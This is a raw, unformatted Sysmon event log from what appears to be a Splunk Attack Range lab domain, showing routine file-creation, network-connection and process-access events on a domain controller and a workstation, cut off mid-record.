08:08:32.025{466BC892-F87F-60EB-FE7D-00000000CF01}9608ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_1o0z1sww.qdu.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.025{466BC892-F87F-60EB-FE7D-00000000CF01}9608ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_1zanxhxy.tey.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001054978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:32.009{466BC892-F87F-60EB-FE7D-00000000CF01}9608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_1zanxhxy.tey.ps12021-07-12 08:08:32.009 23542300x80000000000000001054991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:33.309{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87AE3F59A5EBB6002D6B123CDC7DB023,SHA256=B2DB67F7266D0C0F2C110CDDF1A53606F691026B5B10403D20E0C33A7068393E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810559Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:33.124{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20E6C995CFBE582EAAC7DFCA49DE9E59,SHA256=82697E56AADF65EF7891885B194845F4C222A9AA390EED7965A420A1F1E47815,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810558Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:31.257{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57473-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:34.310{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B3E3F22E835F7AB8AD008A7E4CF8AB1,SHA256=0FA1FE2B8852B2DDF8D53DC09C07E7F45CAA45E255F62D8B26F5D4F2D004EF61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810560Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:34.140{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03551365F0A55AEDBCB49F4B31883031,SHA256=EFF9D1BF123073EB0D69070D8E2D46510269BF17EF5ECA9635335DAB574B9ABC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:35.578{466BC892-F87F-60EB-FE7D-00000000CF01}9608ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:35.325{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F86AF75CB6C0872043B2A563F97D669,SHA256=A854B87F2C9943F9A3FA801C8721E1C9AFDD8B10A7A260C687BF82AF37D583A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810561Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:35.141{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D373B131CE2C7B002EAC976FF157F3BD,SHA256=A94C486D76E45DD71D5E18D60A5D87D6730343530E2BCC0F86FB7947BF71C0FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:36.578{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D6047E3404738FE08DEEDC471FA0F664,SHA256=0E5967669C287052374BC9CE5E43D903776E13BC9D7D0828440E56252A20C239,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:36.343{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7354D9E3FA5A6C5FBB89AC13614C0AAA,SHA256=E9B53064937026AC091FD0513D659B6F5AFFA8CC515DB9BBA93A5EB21809FB06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810562Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:36.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6827309D1EE6C5DB28CB562710FB0F68,SHA256=94A6E9EBBCE4E902D3A3B30F39FB295FE5383E8ECCF75132B291F27C03EB8146,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:37.377{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78E740B1B7003CA8990155B37F16FB44,SHA256=B70FC94819FAA95644F504FF4BD24EF2733C8DDBC2588D1E425661B4C2F1315F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810563Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:37.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E88A04D750C5FEB5C7A2363582C631E,SHA256=728B0A785E7BC06847834ECB6FEC423A60CE0BD9F62E0AA129A21D11723A8783,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:38.694{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=5C7229B62E750B3D461864B87788A26D,SHA256=19ABB45DC44306312744A7CC1BA0D5C3F3E0917DBEC50046673A1B7FE263E246,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:30.619{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61980-false10.0.1.12-8000- 23542300x80000000000000001054998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:38.378{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1498E9E78A9F1E57ECD9A8728D7D53E2,SHA256=333CD6846F1A30960BC1FBC1B441AFF0BC217ECC50BA0DE10C53E97A2D4A48A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810564Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:38.173{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6069D50FE57BD4B74AF34B59769CC7C0,SHA256=A37D1B3E29CD20BB6C76E8407CF75E9A7710B09505B30AC4C9BEF2BD420677DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:39.408{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95C41AC6BA0B3F2CE9A28860EE4D38F1,SHA256=AF787A1208EF0A422DFAFEB15C604097DD06D76C9C95C52C4014B275A544FFA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810566Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:39.173{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A4F4F4B935DD16C1FE8C509CF27F855,SHA256=65070269A66ABB15FA1D1043AB1D337EBA0E24BC627713C5EC83CA7F4FDDF50D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810565Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:37.212{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57474-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001055002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:40.409{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C49DF08186F9AC31D2F2B9175B0C6977,SHA256=7D99406A4EED91B312C0335B7A23C9D44BD5C591CB07356FD8DBE1501D3F54A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810567Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:40.188{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1ACD589FE695FF4EF88E1B5F47680C51,SHA256=E6E887DB20719D71CE46037E738358D944CC44B4A836F6CAC99111B67438AD66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.492{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.492{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.492{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.423{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F797976B4C77BAEC28AB6F5D2660DCE,SHA256=71A614A2A42C06EE920396134EF2BB0C9D818EDD9A4DD546833D55E67CA3CE44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810568Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:41.204{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2701A6AEF3FF003363F2A4F2FCF9F66,SHA256=0601698F85C27572E7106C6A0E849717700A8C762612E099E39905BD7DC75C9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9A16DEA430AADD159BFA008E64678215,SHA256=E641468739BF52686908B8F7A35529BF3FC6D24CFB2D0480430BCA78DF960D7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=86BACAD153D5D987459669ED27E1B31A,SHA256=971918CF032AABF96E5EF82E4D218527F8A52B6CAA2EC2E50A3AF628A6CA9CB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=AE321723C60B29EEA0E1E2AAD3E4D2BB,SHA256=8DF0C97D17A65B82D4EEE24651BDD235BA5F3BEC692347EC7AE32DB7902E69F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F03716FB8346B6A59C7B095A26F866FE,SHA256=2CEE11BE2EC052170974D3A39595E8969F3A0B04834A3C753E1EC7A886B0F9CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BEF702C68D2C1F4863A021B0A54B72DA,SHA256=D8C82DA3D71614A04BC7928EB9E15FE96A1ADBA522B265D3C3EAD51F679BB4A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B80F36229DFCBC883064FA19F470B6A7,SHA256=1B475BD3A51EE9B17E675332F75F539277101C6AC401CFCD326C5A44025CFD4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=19AE71E954DAEE5BD2BF2C8E093B71E1,SHA256=2788C44332C626F36660D583D8D36C58EBD30F72272E71485555219F148B0D84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=004CBE78171572C59B98DC8DAC36E417,SHA256=1E1B83A32D80A6E7210598E86B21D3FB87B8129B4930286FD53D9074C746777D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1574B539508CB4F416EA4E8A579F5BEE,SHA256=B0EF97479157ADB68EF0E45FDF6605B122FDA31F87C7B83ED8EFBE33D43889C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=634365100B910E3851CCCA93E206CBC6,SHA256=EAB18DD44789CC0D4AAAC6A9FB6D0130601BEDB84F087CFCE2F35076F05DC95B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:41.177{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8E876E2818C15179EA3FD76959DA85D0,SHA256=8E49AA829CD09950CBE1BD1A9C1D496D0110CB11C55B8C8D7E766DD634EA2CD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:42.441{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9533C040F94DF5D4FE49F925D1BAE8E,SHA256=70A4C5FD273A4469005402E7580A6EDD9EB95FAB59BBA03C9BB5B5A33D2DA9E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810571Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:42.985{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=239D8D471657A283813C3FB6BB80206A,SHA256=D5636E46A29A0289DEEEB060981A745ED95893E99BA0607585CB6FF87658C8F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810570Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:42.985{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DF2622C17EF987A9490DD87571C3280A,SHA256=C432771DA0CAF8A9236008E0B3892B2625F89EA613C29CA2184E5E83B5061179,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810569Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:42.219{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D68D5E7E4E1FB6780C5341EBA2E9E60A,SHA256=24F09209A7A48F14829D5A4F56D2984969C00D0F4CEF7776968B5F53535D7EE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:35.495{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57475-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001055019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:43.459{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EDA2AA29F0D13FB41ABC89821DDE880,SHA256=E624B3AAEBA68E46BAE448950E2FFF416048A67DFC56C667C8C188C76368853E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810574Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:43.219{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF96773C52AC3FF5F988C02F582CCCAC,SHA256=A6A2194923E228647E9A40872F917568495BEB792DEA3A13EAE26E40DBCAABEB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810573Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:42.121{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57475-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000810572Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:41.814{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-51985-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x80000000000000001055022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:36.585{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 